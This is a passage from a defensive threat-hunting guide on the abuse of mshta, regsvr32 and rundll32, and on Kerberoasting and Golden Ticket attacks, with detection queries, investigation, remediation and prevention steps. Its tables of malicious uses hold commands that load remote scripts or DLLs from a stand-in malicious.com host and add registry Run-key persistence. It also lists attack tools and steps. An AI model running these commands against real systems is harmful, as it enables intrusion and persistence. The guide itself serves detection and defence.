# part 2 ## 🚨 **Signed Binary Proxy Execution - `mshta.exe`** ### πŸ” **1. Attack Breakdown** #### πŸ“ **What is `mshta.exe`?** * `mshta.exe` (**Microsoft HTML Application Host**) is a legitimate Windows binary used to **execute HTA (HTML Application)** files. * It supports scripting languages like VBScript and JavaScript. #### πŸ“‘ **Why Attackers Abuse `mshta.exe`?** * **Signed Binary:** Trusted by Windows, can bypass application whitelisting. * **Supports Remote Scripts:** Can directly execute scripts hosted on malicious servers. * **Fileless Attacks:** Scripts can run entirely in memory. * **Proxy Execution:** Execute malicious payloads indirectly. *** #### πŸ“Œ **Common Malicious Uses of `mshta.exe`** | **Technique** | **Example Command** | **Purpose** | | ---------------------------- | ------------------------------------------------------------------------------------------------------------------- | --------------------------------- | | **Remote Script Execution** | `mshta.exe http://malicious.com/script.hta` | Execute script from external URL. | | **Encoded Script Execution** | `mshta.exe vbscript:Execute("cmd /c calc.exe")` | Run commands using VBScript. | | **Obfuscated Payload** | `mshta.exe "javascript:eval('base64_encoded_payload')"` | Execute encoded payloads. | | **Persistence Mechanism** | `reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d "mshta.exe C:\temp\payload.hta"` | Add registry persistence. | *** ### πŸ›‘οΈ **2. Detection Techniques** #### πŸ“Š **Manual Inspection** **πŸ•΅οΈ Check for Active `mshta.exe` Processes** ```powershell Get-Process -Name mshta ``` **πŸ•΅οΈ Check Command-Line History for `mshta.exe`** ```powershell Get-History | Where-Object { $_.CommandLine -match "mshta" } ``` **πŸ•΅οΈ List Remote Connections by `mshta.exe`** ```powershell Get-NetTCPConnection | Where-Object { $_.OwningProcess -eq (Get-Process -Name mshta).Id } ``` *** #### πŸ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **πŸ•΅οΈ Detect `mshta.exe` Executions** ```kusto DeviceProcessEvents | where FileName == "mshta.exe" | project Timestamp, DeviceName, FolderPath, ProcessCommandLine, AccountName ``` **πŸ•΅οΈ Detect Remote Script Execution via `mshta.exe`** ```kusto DeviceProcessEvents | where FileName == "mshta.exe" | where ProcessCommandLine contains "http" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **πŸ•΅οΈ Identify Encoded or Obfuscated Payloads** ```kusto DeviceProcessEvents | where FileName == "mshta.exe" | where ProcessCommandLine matches regex "(?i)base64|eval|vbscript" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **πŸ•΅οΈ Identify Network Activity from `mshta.exe`** ```kusto DeviceNetworkEvents | where InitiatingProcessFileName == "mshta.exe" | where RemoteIP != "127.0.0.1" | project Timestamp, DeviceName, RemoteIP, RemoteUrl, ProcessCommandLine ``` *** #### πŸ“Š **Event Viewer Logs** * **Event ID 4688:** Process Creation * **Event ID 4104:** Script Block Logging * **Event ID 5156:** Network Connection Allowed **Filter Example:** * Open **Event Viewer** β†’ `Windows Logs β†’ Security` * Search for: ```yaml Process Name: mshta.exe Command Line: http, vbscript, eval ``` *** ### πŸ•΅οΈ **3. Investigation Techniques** #### 1️⃣ **Inspect Command Line Arguments** * Identify URLs, encoded commands, or file paths: ```powershell Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "mshta.exe" } | Select-Object CommandLine ``` *** #### 2️⃣ **Check Remote Connections** * List outbound network connections: ```powershell netstat -ano | findstr :80 netstat -ano | findstr :443 ``` *** #### 3️⃣ **Validate Remote URLs or IPs** * Verify IPs or domains with **VirusTotal**, **AbuseIPDB**, or **Shodan**: ```powershell Invoke-RestMethod -Uri "https://ipinfo.io/" ``` *** #### 4️⃣ **Inspect Registry Persistence** * Look for startup entries using `mshta.exe`: ```powershell Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" ``` *** #### 5️⃣ **Analyze HTA Files** * Check downloaded `.hta` files: ```powershell Get-ChildItem -Path "C:\Temp" -Filter "*.hta" Get-Content "C:\Temp\script.hta" ``` *** ### πŸ”§ **4. Remediation Steps** #### πŸ“Œ **1. Terminate Suspicious Processes** ```powershell Stop-Process -Name mshta -Force ``` #### πŸ“Œ **2. Block Outbound Traffic** ```powershell New-NetFirewallRule -DisplayName "Block mshta Public Traffic" -Direction Outbound -RemoteAddress "" -Action Block ``` #### πŸ“Œ **3. Remove Registry Persistence** ```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "malicious" ``` #### πŸ“Œ **4. Quarantine Malicious Files** ```powershell Move-Item -Path "C:\Temp\malicious.hta" -Destination "C:\Quarantine" ``` #### πŸ“Œ **5. Perform Full Antivirus Scan** ```powershell Start-MpScan -ScanType FullScan ``` *** ### πŸ›‘οΈ **5. Prevention Steps** 1. **Restrict Execution of `mshta.exe`:** * Block it via **AppLocker** or **WDAC**. 2. **Monitor Remote Script Executions:** * Alert for `mshta.exe` executing remote scripts. 3. **Enable Script Block Logging:** ```powershell Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 ``` 4. **Enable Attack Surface Reduction (ASR) Rules:** ```powershell Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled ``` 5. **Monitor Non-Standard Execution Paths:** * Ensure HTA files are not executed from `Temp` or `AppData`. 6. **Educate Users:** * Train users to avoid clicking on `.hta` files from unknown sources. *** ### 🧠 **6. Key Takeaways** * **Monitor HTTP/S Connections:** `mshta.exe` rarely communicates with public IPs. * **Obfuscation Detection:** Look for Base64 and JavaScript commands. * **Registry Analysis:** Watch for `mshta.exe` in Run keys. * **Disable Unused Binaries:** Block execution of `mshta.exe` if not needed. *** ## 🚨 **Signed Binary Proxy Execution - `regsvr32.exe`** ### πŸ” **1. Attack Breakdown** #### πŸ“ **What is `regsvr32.exe`?** * `regsvr32.exe` (**Microsoft Register Server**) is a legitimate Windows utility used to **register or unregister DLL files** in the Windows Registry. * It supports remote loading of DLLs and scriptlets via URLs. #### πŸ“‘ **Why Attackers Abuse `regsvr32.exe`?** * **Signed Binary:** Trusted by Windows and bypasses security controls. * **Remote Payload Loading:** Can load remote scripts or DLLs. * **Proxy Execution:** Run malicious code indirectly. * **Fileless Attacks:** Execute payloads in memory without leaving traces on disk. *** #### πŸ“Œ **Common Malicious Uses of `regsvr32.exe`** | **Technique** | **Example Command** | **Purpose** | | ----------------------------- | --------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------- | | **Remote Script Execution** | `regsvr32.exe /s /u /i:http://malicious.com/script.sct scrobj.dll` | Load and execute remote script. | | **Local DLL Execution** | `regsvr32.exe /s malicious.dll` | Load and execute local DLL payload. | | **Encoded Payload Execution** | `regsvr32.exe /u /n /i:"javascript:eval('Base64Payload')" scrobj.dll` | Execute encoded JavaScript payload. | | **Persistence Mechanism** | `reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Persist /t REG_SZ /d "regsvr32.exe /i:http://malicious.com/payload.sct"` | Add persistence in registry. | *** ### πŸ›‘οΈ **2. Detection Techniques** #### πŸ“Š **Manual Inspection** **πŸ•΅οΈ Check Running Instances of `regsvr32.exe`:** ```powershell Get-Process -Name regsvr32 -IncludeUserName | Select-Object ProcessName, Id, Path, StartTime ``` **πŸ•΅οΈ List Recent Commands Containing `regsvr32.exe`:** ```powershell Get-History | Where-Object { $_.CommandLine -match "regsvr32" } ``` **πŸ•΅οΈ Identify Suspicious Network Connections:** ```powershell Get-NetTCPConnection | Where-Object { $_.OwningProcess -eq (Get-Process -Name regsvr32).Id } ``` *** #### πŸ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **πŸ•΅οΈ Detect `regsvr32.exe` Execution:** ```kusto DeviceProcessEvents | where FileName == "regsvr32.exe" | project Timestamp, DeviceName, ProcessCommandLine, FolderPath, AccountName ``` **πŸ•΅οΈ Detect Remote Payload Execution via `regsvr32.exe`:** ```kusto DeviceProcessEvents | where FileName == "regsvr32.exe" | where ProcessCommandLine contains "http" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **πŸ•΅οΈ Identify Encoded or Obfuscated Payloads:** ```kusto DeviceProcessEvents | where FileName == "regsvr32.exe" | where ProcessCommandLine matches regex "(?i)javascript|eval|Base64" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **πŸ•΅οΈ Detect `regsvr32.exe` Communicating with Public IP:** ```kusto DeviceNetworkEvents | where InitiatingProcessFileName == "regsvr32.exe" | where RemoteIP != "127.0.0.1" | where RemoteIP != "::1" | project Timestamp, DeviceName, RemoteIP, RemoteUrl, ProcessCommandLine ``` *** #### πŸ“Š **Event Viewer Logs** * **Event ID 4688:** Process Creation * **Event ID 4104:** Script Block Logging (PowerShell) * **Event ID 5156:** Network Connection Allowed **Filter Example:** * Open **Event Viewer** β†’ `Windows Logs β†’ Security` * Search for: ```arduino Process Name: regsvr32.exe Process Command Line: http, javascript, eval ``` *** ### πŸ•΅οΈ **3. Investigation Techniques** #### 1️⃣ **Inspect Command Line Arguments** * Identify URLs, encoded commands, or file paths: ```powershell Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "regsvr32.exe" } | Select-Object CommandLine ``` *** #### 2️⃣ **Validate Remote URLs or IPs** * Verify IPs or domains with **VirusTotal**, **AbuseIPDB**, or **Shodan**: ```powershell pInvoke-RestMethod -Uri "https://ipinfo.io/" ``` *** #### 3️⃣ **Trace Parent Processes** * Identify the parent process that triggered `regsvr32.exe`: ```powershell Get-CimInstance Win32_Process | Where-Object { $_.ProcessId -eq } | Select-Object ParentProcessId ``` *** #### 4️⃣ **Analyze Network Traffic** * Monitor outbound connections initiated by `regsvr32.exe`: ```powershell netstat -ano | findstr :80 netstat -ano | findstr :443 ``` *** #### 5️⃣ **Inspect Registry for Persistence** * Look for startup entries involving `regsvr32.exe`: ```powershell Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" ``` *** ### πŸ”§ **4. Remediation Steps** #### πŸ“Œ **1. Terminate Suspicious Processes** ```powershell Stop-Process -Name regsvr32 -Force ``` #### πŸ“Œ **2. Block Outbound Traffic** ```powershell New-NetFirewallRule -DisplayName "Block regsvr32 Public Traffic" -Direction Outbound -RemoteAddress "" -Action Block ``` #### πŸ“Œ **3. Remove Registry Persistence** ```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "malicious" ``` #### πŸ“Œ **4. Quarantine Malicious Files** ```powershell Move-Item -Path "C:\Temp\malicious.dll" -Destination "C:\Quarantine" ``` #### πŸ“Œ **5. Perform Full Antivirus Scan** ```powershell Start-MpScan -ScanType FullScan ``` *** ### πŸ›‘οΈ **5. Prevention Steps** 1. **Restrict Execution of `regsvr32.exe`:** * Block it via **AppLocker** or **WDAC**. 2. **Monitor Remote Script Executions:** * Alert for `regsvr32.exe` executing remote scripts. 3. **Enable Script Block Logging:** ```powershell Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 ``` 4. **Enable Attack Surface Reduction (ASR) Rules:** ```powershell Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled ``` 5. **Monitor Non-Standard Execution Paths:** * Ensure DLLs are not executed from `Temp` or `AppData`. 6. **Educate Users:** * Avoid opening unknown `.dll` or `.sct` files. *** ### 🧠 **6. Key Takeaways** * **Monitor HTTP/S Connections:** `regsvr32.exe` rarely communicates with public IPs. * **Obfuscation Detection:** Look for `javascript`, `eval`, and Base64 encoding. * **Registry Analysis:** Watch for `regsvr32.exe` entries in Run keys. * **Disable Unused Binaries:** If not needed, disable `regsvr32.exe`. *** ## 🚨 **Signed Binary Proxy Execution - `rundll32.exe`** ### πŸ” **1. Attack Breakdown** #### πŸ“ **What is `rundll32.exe`?** * `rundll32.exe` is a **legitimate Windows binary** used to load and execute DLL (Dynamic Link Library) files. * It can execute **exported functions from DLLs** and **execute JavaScript/VBScript** with certain arguments. #### πŸ“‘ **Why Attackers Abuse `rundll32.exe`?** * **Signed Binary:** Trusted by Windows, often bypasses security monitoring tools. * **Proxy Execution:** Executes malicious DLL payloads indirectly. * **Remote Execution:** Can load DLLs or scripts from remote locations. * **Fileless Attacks:** Executes payloads directly in memory. * **Obfuscation Potential:** Commands can be heavily obfuscated. *** #### πŸ“Œ **Common Malicious Uses of `rundll32.exe`** | **Technique** | **Example Command** | **Purpose** | | ------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------- | | **Execute DLL Function** | `rundll32.exe C:\malicious.dll,EntryPoint` | Execute exported DLL function. | | **Remote DLL Execution** | `rundll32.exe http://malicious.com/payload.dll,EntryPoint` | Execute remote payload. | | **Fileless Execution** | `rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write('...')` | Execute JavaScript in memory. | | **PowerShell Execution** | `rundll32.exe PowrProf.dll, SetSuspendState` | Abuse legitimate DLLs for code execution. | | **Persistence Mechanism** | `reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Persist /t REG_SZ /d "rundll32.exe C:\Temp\payload.dll,EntryPoint"` | Add persistence via registry. | *** ### πŸ›‘οΈ **2. Detection Techniques** #### πŸ“Š **Manual Inspection** **πŸ•΅οΈ List Active `rundll32.exe` Processes** ```powershell Get-Process -Name rundll32 | Select-Object ProcessName, Id, Path, StartTime ``` **πŸ•΅οΈ Check Suspicious Command Lines** ```powershell Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | Where-Object { $_.Message -match "rundll32" } ``` **πŸ•΅οΈ Check Recently Created DLLs** ```powershell Get-ChildItem -Path "C:\Windows\Temp", "C:\Users\\AppData\Local\Temp" -Filter "*.dll" -Recurse ``` *** #### πŸ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **πŸ•΅οΈ Detect `rundll32.exe` Executions** ```kusto DeviceProcessEvents | where FileName == "rundll32.exe" | project Timestamp, DeviceName, ProcessCommandLine, FolderPath, AccountName ``` **πŸ•΅οΈ Detect Remote Payload Execution** ```kusto DeviceProcessEvents | where FileName == "rundll32.exe" | where ProcessCommandLine contains "http" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **πŸ•΅οΈ Identify Encoded or Obfuscated Commands** ```kusto DeviceProcessEvents | where FileName == "rundll32.exe" | where ProcessCommandLine matches regex "(?i)javascript|eval|base64" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **πŸ•΅οΈ Monitor Network Connections by `rundll32.exe`** ```kusto DeviceNetworkEvents | where InitiatingProcessFileName == "rundll32.exe" | where RemoteIP != "127.0.0.1" | where RemoteIP != "::1" | project Timestamp, DeviceName, RemoteIP, RemoteUrl, ProcessCommandLine ``` *** #### πŸ“Š **Event Viewer Logs** * **Event ID 4688:** Process Creation * **Event ID 5156:** Network Connection Allowed * **Event ID 4104:** PowerShell Script Block Logging **Filter Example:** * Open **Event Viewer** β†’ `Windows Logs β†’ Security` * Search for: ```yaml Process Name: rundll32.exe Command Line: http, javascript, base64 ``` *** ### πŸ•΅οΈ **3. Investigation Techniques** #### 1️⃣ **Inspect Command Line Arguments** * Analyze the full command line: ```powershell Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "rundll32.exe" } | Select-Object CommandLine ``` *** #### 2️⃣ **Trace Parent Processes** * Identify the parent process: ```powershell Get-CimInstance Win32_Process | Where-Object { $_.ProcessId -eq } | Select-Object ParentProcessId ``` *** #### 3️⃣ **Validate Remote IPs/URLs** * Verify URLs and IPs using **VirusTotal** or **AbuseIPDB**: ```powershell Invoke-RestMethod -Uri "https://ipinfo.io/" ``` *** #### 4️⃣ **Analyze DLLs** * Check metadata and contents of the DLL: ```powershell Get-Item "C:\Temp\malicious.dll" | Select-Object Name, CreationTime, LastWriteTime ``` * Dump and analyze: ```powershell Get-Content "C:\Temp\malicious.dll" ``` *** #### 5️⃣ **Check Registry for Persistence** * Look for `rundll32.exe` entries in Run keys: ```powershell Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" ``` *** ### πŸ”§ **4. Remediation Steps** #### πŸ“Œ **1. Terminate Suspicious Processes** ```powershell Stop-Process -Name rundll32 -Force ``` #### πŸ“Œ **2. Block Outbound Traffic** ```powershell New-NetFirewallRule -DisplayName "Block rundll32 Public Traffic" -Direction Outbound -RemoteAddress "" -Action Block ``` #### πŸ“Œ **3. Remove Registry Persistence** ```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "malicious" ``` #### πŸ“Œ **4. Quarantine Suspicious DLLs** ```powershell Move-Item -Path "C:\Temp\malicious.dll" -Destination "C:\Quarantine" ``` #### πŸ“Œ **5. Perform Full Antivirus Scan** ```powershell Start-MpScan -ScanType FullScan ``` *** ### πŸ›‘οΈ **5. Prevention Steps** 1. **Restrict Execution of `rundll32.exe`:** * Block non-standard DLL execution via **AppLocker** or **WDAC**. 2. **Monitor Remote Script Execution:** * Create alerts for remote DLL execution. 3. **Enable Script Block Logging:** ```powershell Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 ``` 4. **Enable Attack Surface Reduction (ASR) Rules:** ```powershell Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled ``` 5. **Monitor Non-Standard Execution Paths:** * Prevent DLL execution from `Temp` and `AppData`. 6. **User Awareness Training:** * Educate users about malicious DLLs. *** ### 🧠 **6. Key Takeaways** * **Proxy Execution:** `rundll32.exe` can proxy malicious DLL execution. * **Monitor Outbound Connections:** Look for public IP communication. * **Obfuscation Patterns:** Detect `javascript`, `base64`, or remote URLs. * **Registry Auditing:** Watch for `rundll32.exe` in `Run` keys. *** ## 🚨 **Kerberoasting Attack: Advanced Threat Analysis** ### πŸ” **1. Attack Breakdown** #### πŸ“ **What is Kerberoasting?** * **Kerberoasting** is an attack targeting **Service Principal Names (SPNs)** in an **Active Directory (AD)** environment. * Attackers exploit weak **service account passwords** by requesting **Kerberos Ticket Granting Service (TGS) tickets** and attempting to **crack the hash offline**. #### πŸ“‘ **Why Attackers Use Kerberoasting?** * **No Elevated Privileges Required:** Any domain user can request SPN tickets. * **Offline Hash Cracking:** Allows attackers to crack hashes without interacting with the domain. * **No Account Lockouts:** Offline cracking prevents triggering account lockouts. * **Privilege Escalation:** Successful password cracking may grant access to privileged accounts. *** #### πŸ“Œ **Attack Phases** 1️⃣ **Enumeration:** Identify service accounts with SPNs using tools like `setspn`, PowerShell, or LDAP queries.\ 2️⃣ **Request TGS Tickets:** Use tools like `Rubeus`, `Impacket`, or `PowerView` to request Kerberos tickets for service accounts.\ 3️⃣ **Extract Ticket Hashes:** Extract the `RC4-HMAC` hashes from the tickets.\ 4️⃣ **Crack Hashes Offline:** Use tools like **John the Ripper** or **Hashcat** to crack the extracted hashes.\ 5️⃣ **Lateral Movement:** Use cracked credentials for lateral movement and privilege escalation. *** #### πŸ“Š **Tools Commonly Used in Kerberoasting** | **Tool** | **Purpose** | | ----------------------------- | ------------------------------------------- | | **Rubeus** | Kerberos ticket manipulation and extraction | | **Impacket (GetUserSPNs.py)** | Enumerate and request SPN tickets | | **PowerView** | Enumerate SPNs via PowerShell | | **Kerberoast** | Extract and crack Kerberos tickets | | **Hashcat** | Offline password cracking | | **John the Ripper** | Offline password cracking | *** ### πŸ›‘οΈ **2. Detection Techniques** #### πŸ“Š **Manual Detection with PowerShell** **πŸ•΅οΈ Identify SPNs in Active Directory** ```powershell Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select-Object Name, ServicePrincipalName ``` **πŸ•΅οΈ Monitor Kerberos Ticket Requests (Event ID 4769)** * Open **Event Viewer** β†’ `Windows Logs β†’ Security` β†’ Filter by **Event ID 4769** * Look for: * **Service Name:** Suspicious or high-value accounts * **Encryption Type:** `0x17 (RC4-HMAC)` is common in Kerberoasting **πŸ•΅οΈ Check for Excessive TGS Requests** ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} | Where-Object { $_.Message -match "0x17" } ``` *** #### πŸ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **πŸ•΅οΈ Detect Excessive TGS Requests** ```kusto SecurityEvent | where EventID == 4769 | where TicketEncryptionType == "0x17" | summarize count() by AccountName, IpAddress | where count_ > 10 ``` **πŸ•΅οΈ Identify Suspicious SPN Enumeration** ```kusto DeviceProcessEvents | where FileName contains "powershell.exe" or FileName contains "rubeus.exe" | where ProcessCommandLine contains "kerberoast" or ProcessCommandLine contains "getuserspns" | project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName ``` **πŸ•΅οΈ Monitor Hash Extraction Tools** ```kusto DeviceFileEvents | where FileName contains "hashcat" or FileName contains "john" | project Timestamp, DeviceName, FileName, FolderPath, AccountName ``` *** #### πŸ“Š **Event Viewer Logs** * **Event ID 4769:** Kerberos Service Ticket Request * **Event ID 4625:** Failed Login Attempt (if lateral movement follows Kerberoasting) * **Event ID 4648:** Logon with Explicit Credentials **πŸ“Œ Look for Key Indicators:** * Ticket encryption type: `0x17 (RC4-HMAC)` * Excessive TGS requests from a single IP address or account *** ### πŸ•΅οΈ **3. Investigation Techniques** #### 1️⃣ **Identify Target Accounts** * Check high-privilege accounts with SPNs: ```powershell Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Where-Object {$_.Enabled -eq $true} ``` *** #### 2️⃣ **Trace IP Address of Ticket Requests** * Investigate IP addresses making frequent TGS requests: ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} | Where-Object { $_.Properties[2].Value -match "0x17" } ``` *** #### 3️⃣ **Analyze Tools Used** * Look for tools like `Rubeus.exe`, `impacket`, `powershell.exe` with Kerberoasting commands. *** #### 4️⃣ **Check Offline Password Cracking Activity** * Monitor tools like **John the Ripper**, **Hashcat**, or massive hash dump files in `Temp` or `AppData`. *** #### 5️⃣ **Investigate Credential Use Post-Cracking** * Check Event Logs for lateral movement: * **Event ID 4624:** Successful Logon * **Event ID 4634:** Logoff * **Event ID 4661:** Access to objects *** ### πŸ”§ **4. Remediation Steps** #### πŸ“Œ **1. Reset Compromised Account Passwords** * Change passwords for all suspected service accounts. * Ensure passwords are **long and complex**. #### πŸ“Œ **2. Enable Kerberos AES Encryption** * Disable RC4 encryption in Kerberos: ```powershell Set-ADAccountControl -Identity -KerberosEncryptionType AES256 ``` #### πŸ“Œ **3. Audit Service Accounts** * Ensure service accounts follow the **least privilege principle**. * Avoid excessive SPNs. #### πŸ“Œ **4. Monitor for Tools and Scripts** * Block `Rubeus`, `Impacket`, and other Kerberoasting tools. #### πŸ“Œ **5. Enable Account Lockout Policy** * Implement an account lockout policy to detect brute-force attempts. *** ### πŸ›‘οΈ **5. Prevention Steps** 1. **Strong Service Account Passwords:** * At least **25+ characters** with uppercase, lowercase, numbers, and symbols. 2. **Disable Unused SPNs:** ```powershell Set-ADUser -Identity -ServicePrincipalNames @{Remove="SPN"} ``` 3. **Enable Kerberos AES Encryption:** * Avoid RC4 encryption. 4. **Implement Group Managed Service Accounts (gMSA):** * Use gMSAs for service accounts. 5. **Real-Time Monitoring for TGS Requests:** * Configure SIEM alerts for **Event ID 4769** with RC4-HMAC. 6. **Use Managed Security Solutions:** * Solutions like **Microsoft Defender for Identity (MDI)** or **CrowdStrike Falcon**. *** ### 🧠 **6. Key Takeaways** * **Encryption Matters:** Avoid RC4 encryption in Kerberos tickets. * **Audit Service Accounts:** Remove unnecessary SPNs. * **Monitor TGS Requests:** Look for repeated requests with RC4-HMAC encryption. * **Offline Cracking Is Silent:** Focus on ticket requests, not brute-force attempts. * **Account Hygiene:** Strong, unique passwords for service accounts. *** ## 🚨 **Golden Ticket Attack: Advanced Threat Analysis** ### πŸ” **1. Attack Breakdown** #### πŸ“ **What is a Golden Ticket Attack?** * A **Golden Ticket Attack** is a post-exploitation technique where an attacker **forges a Kerberos Ticket Granting Ticket (TGT)** using the **KRBTGT account hash**. * With a Golden Ticket, an attacker can **impersonate any user**, including domain admins, and gain **unrestricted access** to the Active Directory (AD) environment. #### πŸ“‘ **Why Attackers Use Golden Tickets?** * **Unlimited Access:** Gain access to any resource in the domain. * **Persistence:** Golden Tickets remain valid even after password resets for regular accounts. * **Stealth:** Hard to detect without specialized monitoring. * **Flexibility:** Can create TGTs for any user, SID, or privilege level. #### πŸ›‘οΈ **Requirements for a Golden Ticket Attack:** 1. **Domain Admin Access:** Required to extract the `krbtgt` NTLM hash. 2. **Domain SID:** Security Identifier of the domain. 3. **KRBTGT Account Hash:** Extracted using tools like **Mimikatz**. 4. **Domain Name:** FQDN of the domain. #### πŸ“Œ **Attack Steps:** 1️⃣ **Compromise Domain Admin Account:** Gain access to an account with sufficient privileges.\ 2️⃣ **Extract KRBTGT Hash:** Use tools like **Mimikatz** to dump the KRBTGT hash.\ 3️⃣ **Forge a TGT:** Create a fake TGT using the extracted hash.\ 4️⃣ **Impersonate Any User:** Use the forged TGT to access domain resources.\ 5️⃣ **Lateral Movement & Persistence:** Move laterally across the network, maintain persistence. *** #### πŸ“Š **Common Tools Used in Golden Ticket Attacks** | **Tool** | **Purpose** | | --------------- | --------------------------------------------- | | **Mimikatz** | Dump KRBTGT hash and forge Golden Tickets | | **Rubeus** | Kerberos ticket manipulation | | **Impacket** | Pass-the-Ticket attacks | | **Responder** | Lateral movement and credential harvesting | | **PowerSploit** | Credential extraction and ticket manipulation | *** ### πŸ›‘οΈ **2. Detection Techniques** #### πŸ“Š **Manual Detection with PowerShell** **πŸ•΅οΈ Check KRBTGT Account Modifications** ```powershell Get-ADUser -Identity krbtgt -Properties LastLogonDate, PasswordLastSet ``` * **Red Flag:** `PasswordLastSet` hasn't been changed in a long time. **πŸ•΅οΈ Look for Suspicious TGT Requests** * Monitor **Event ID 4769** for abnormal activity. **πŸ•΅οΈ Check for Unusual Privileges in Kerberos Tickets** ```powershell klist tickets ``` * Look for tickets with **abnormally long lifetimes** or **unusual user SIDs**. *** #### πŸ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **πŸ•΅οΈ Detect Suspicious Kerberos TGT Requests** ```kql SecurityEvent | where EventID == 4769 | where TicketOptions contains "0x40810000" // Indicates forged tickets | project Timestamp, DeviceName, AccountName, IpAddress ``` **πŸ•΅οΈ Identify Abnormal KRBTGT Activity** ```kql DeviceProcessEvents | where InitiatingProcessFileName contains "mimikatz" or InitiatingProcessCommandLine contains "kerberos::golden" | project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName ``` **πŸ•΅οΈ Look for Long-Lived Kerberos Tickets** ```kql SecurityEvent | where EventID == 4769 | where TicketLifetime > 10h | project Timestamp, DeviceName, AccountName, TicketLifetime ``` **πŸ•΅οΈ Identify NTLM Hash Dumps** ```kql DeviceProcessEvents | where ProcessCommandLine contains "lsass.exe" or ProcessCommandLine contains "dump" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` *** #### πŸ“Š **Event Viewer Logs** | **Event ID** | **Description** | | ------------ | ---------------------------------- | | **4768** | TGT was requested | | **4769** | Service ticket was requested | | **4771** | Kerberos pre-authentication failed | | **4624** | Successful account logon | **πŸ•΅οΈ Focus on Event ID 4768 and 4769** * Look for tickets with unusually **long lifetimes**. * Check for tickets issued to **non-standard accounts** (e.g., non-admin accounts with high privileges). *** ### πŸ•΅οΈ **3. Investigation Techniques** #### 1️⃣ **Inspect KRBTGT Account Activity** * Check if the KRBTGT account has been accessed or its password has been reset. #### 2️⃣ **Trace Kerberos Tickets** * Look for **unusual ticket lifetimes**: ```powershell klist tickets ``` #### 3️⃣ **Analyze Ticket Requests** * Check accounts requesting service tickets frequently: ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} ``` #### 4️⃣ **Monitor High-Privilege Accounts** * Look for high-privilege accounts being accessed from unfamiliar systems. #### 5️⃣ **Identify Tool Artifacts** * Look for `mimikatz.exe`, `rubeus.exe`, or unusual PowerShell commands. *** ### πŸ”§ **4. Remediation Steps** #### πŸ“Œ **1. Reset the KRBTGT Account Twice** * Reset the KRBTGT account password twice to invalidate all existing Kerberos tickets: ```powershell Set-ADAccountPassword -Identity krbtgt -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "NewSecurePassword!" -Force) ``` * Wait for replication across all Domain Controllers. #### πŸ“Œ **2. Revoke Active Kerberos Tickets** * Invalidate existing tickets: ```powershell klist purge ``` #### πŸ“Œ **3. Remove Malicious Tickets** * Reboot affected systems to clear all cached tickets. #### πŸ“Œ **4. Audit Domain Admin Accounts** * Check for unauthorized activity across all Domain Admin accounts. #### πŸ“Œ **5. Update and Patch Systems** * Ensure Domain Controllers and Kerberos servers are up-to-date. #### πŸ“Œ **6. Conduct Full Antivirus Scan** ```powershell Start-MpScan -ScanType FullScan ``` *** ### πŸ›‘οΈ **5. Prevention Steps** 1. **Regular KRBTGT Password Resets:** * Rotate KRBTGT passwords **at least every 180 days**. 2. **Enable Monitoring for Admin Activities:** * Track login attempts and service ticket requests. 3. **Use Managed Service Accounts (gMSA):** * Reduce reliance on static service accounts. 4. **Enable Windows Defender Credential Guard:** ```powershell Enable-WindowsOptionalFeature -Online -FeatureName Windows-Defender-Credential-Guard ``` 5. **Enable SIEM Alerts for KRBTGT Access:** * Alerts for access attempts on KRBTGT accounts. 6. **Restrict Domain Admin Access:** * Limit Domain Admin usage to secure workstations. *** ### 🧠 **6. Key Takeaways** * **KRBTGT 